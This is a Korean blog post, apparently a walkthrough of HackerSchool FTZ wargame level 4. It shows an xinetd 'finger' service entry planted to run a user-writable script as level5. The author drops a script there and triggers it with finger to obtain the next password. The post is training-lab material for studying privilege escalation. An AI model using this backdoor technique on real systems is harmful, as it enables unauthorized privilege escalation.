level4 / suck my brain
여기에 사용된 finger에 대해 조사해보면..
finger 는 특정 사용자에 관한 정보를 조회하는 명령어로 사용자에 대한 login명, 실제 이름, 단말기 이름, 로그인한 시간, 유효시간(idle time) 등에 관한 정보를 보여준다.
[level4@ftz level4]$ ls
hint public_html tmp
[level4@ftz level4]$ cat hint
누군가 /etc/xinetd.d/에 백도어를 심어놓았다.!
[level4@ftz level4]$ ls -al /etc/xinetd.d
합계 92
drwxr-xr-x 2 root root 4096 1월 15 2010 .
drwxr-xr-x 52 root root 4096 2월 12 17:56 ..
-rw-r----- 1 root level4 171 12월 8 2003 backdoor
[level4@ftz xinetd.d]$ cat backdoor
service finger
{
disable = no
flags = REUSE
socket_type = stream
wait = no
user = level5
server = /home/level4/tmp/backdoor
log_on_failure += USERID
}
여기에 사용된 finger에 대해 조사해보면..
finger 는 특정 사용자에 관한 정보를 조회하는 명령어로 사용자에 대한 login명, 실제 이름, 단말기 이름, 로그인한 시간, 유효시간(idle time) 등에 관한 정보를 보여준다.
finger [ options ] name
위에서 name은 정보를 조회하고자 하는 사용자의 id 이며, 여기에 "@" 기호가 포함한 원격 호스트상의 사용자 id가 오면, 해당 시스템에 접속하여 사용자정보를 가져 옵니다. 옵션 중 대표적인 것 두가지를 설명하면 다음과 같습니다.
-s 사용자에 대한 간단한 정보만을 출력
-l 사용자에 대한 상세 정보를 출력(디폴트)
다음은 그 사용 예입니다.
% finger ; 시스템을 사용하고 있는 전체 사용자에 대한 간단한 사용자 정보 출력
% finger -s kimys ; 사용자 kimys에 대한 간단한 정보 출력
% finger gglim@guru.kotel.co.kr ; guru.kotel.co.kr 이란 시스템의 사용자 gglim에 대한 상세정보 출력
% finger @guru.kotel.co.kr ; guru.kotel.co.kr에 현재 로긴한 가입에 대한 정보 출력.
단 다른 호스트에 대한 finger시 상대방시스템에서 finger를 허용해야됨.
[level4@localhost tmp]$ cat > backdoor
#!/bin/sh
my-pass
[level4@localhost tmp]$ finger level5@localhost
[level4@localhost tmp]$ chmod 777 backdoor[level4@localhost tmp]$ finger @localhost
^[[H^[[2J
Level5 Password is "what is your name?".
[level4@localhost tmp]$
'컴퓨터 > hackerschool' 카테고리의 다른 글
hackerschool level 6 (0) | 2012.02.17 |
---|---|
hackerschool level 5 (0) | 2012.02.17 |
hackerschool level 3 (0) | 2012.02.13 |
hackerschool level 2 (0) | 2012.02.13 |
hackerschool level 1 (0) | 2012.02.13 |
댓글